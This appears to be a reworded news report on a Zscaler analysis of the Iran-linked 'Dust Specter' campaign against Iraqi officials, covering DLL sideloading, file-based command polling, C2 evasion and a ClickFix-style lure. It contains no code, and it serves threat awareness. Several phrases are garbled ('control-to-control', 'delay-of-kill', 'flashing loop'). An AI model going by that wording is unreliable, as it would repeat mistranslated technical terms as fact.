Dust Specter Targets Iraqi Officials With New SPLITDROP and GHOSTFORM Malware
The alleged Iran-nexus threat actor is said to be behind a campaign targeting government officials in Iraq posing as the country’s Foreign Ministry to deliver an unprecedented batch of malware.
Zscaler ThreatLabz, which saw the activity in January 2026, tracks the collection under the name. Specter of dust. The attack, which appears in the form of two separate infection chains, culminates in the use of malware called SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM.
“Dust Specter used arbitrarily generated URI paths in control-to-control (C2) communications with checksum values appended to the URI paths to ensure that these requests came from a genuine infected system,” said security researcher Sudeep Singh. “The C2 server also used geofencing techniques and user agent authentication.”
A notable feature of the campaign is the compromising of infrastructure related to the Iraqi government to install dangerous payloads, not to mention the use of delay-of-kill tactics and flying under the radar.
The first chain of attacks starts with a password-protected RAR archive, where there is a .NET dropper called SPLITDROP, which acts as a pipeline for TWINTASK, the worker module, and TWINTALK, the C2 orchestrator.
TWINTASK, on the other hand, is a malicious DLL (“libvlc.dll”) that is loaded alongside the legitimate “vlc.exe” binary to periodically poll the file (“C:ProgramDataPolGuidin.txt”) every 15 seconds for new commands and run it using PowerShell. This includes commands to establish persistence on the host through Windows Registry changes. Text output and errors are captured in a separate text file (“C:ProgramDataPolGuidout.txt”).
TWINTASK, when first introduced, is designed to use another official binary present in the extracted archive (“WingetUI.exe”), which makes it sideload the TWINTALK DLL (“hostfxr.dll”). Its main purpose is to access the C2 server for new commands, coordinate tasks with TWINTASK, and output the results back to the server. It supports the ability to write the command body from the C2 response to “in.txt,” as well as download and upload files.
“The C2 orchestrator works in conjunction with a predefined worker module to implement a file-based polling method used for coding,” Singh said. “When executed, TWINTALK goes into a flashing loop and delays execution for a random interval before polling the C2 server for new commands.”
The second series of attacks represents the first evolution, which combines all TWINTASK and TWINTALK functionality into a single binary called GHOSTFORM. It uses an in-memory PowerShell script to execute commands received from the C2 server, thus eliminating the need to write artifacts to disk.
That’s not the only distinguishing feature between the two attack chains. Some GHOSTFORM binaries were found to embed a hard-coded Google Forms URL that was automatically launched in the default web browser when the malware was launched. This form includes the content written in Arabic and it is presented as an official survey from the Ministry of Foreign Affairs of Iraq.
Zscaler’s analysis of TWINTALK and GHOSTFORM source code also revealed the presence of wildcard values, emojis, and Unicode text, suggesting that artificial intelligence (AI) generation tools may have been used to aid in the development of the malware.
In addition, the C2 domain associated with TWINTALK, “meetingapp[.]site,” was allegedly used by Dust Specter actors in a July 2025 campaign to host a fake Cisco Webex meeting invitation page that instructs users to copy, paste, and run a PowerShell script to join the meeting. These instructions reflect a tactic widely seen in ClickFix-style social engineering attacks.
The PowerShell script, on the other hand, creates a directory on the host, and tries to download the unspecified payload from the same domain and save it as an executable within the newly created directory. It also creates a scheduled operation to launch a malicious binary every two hours.
Dust Specter’s connection to Iran is based on the fact that Iranian hacking groups have a history of developing custom .NET backdoors to achieve their goals. The use of vulnerable Iraqi government infrastructure has been seen in previous campaigns linked to threat actors such as OilRig (aka APT34).
“This campaign, associated with medium to high confidence in Dust Specter, may have targeted government officials using social engineering hacks posing as the Iraqi Ministry of Foreign Affairs,” Zscaler said. “The work also reflects broader trends, including ClickFix-style techniques and the increasing use of AI to generate malware development.”
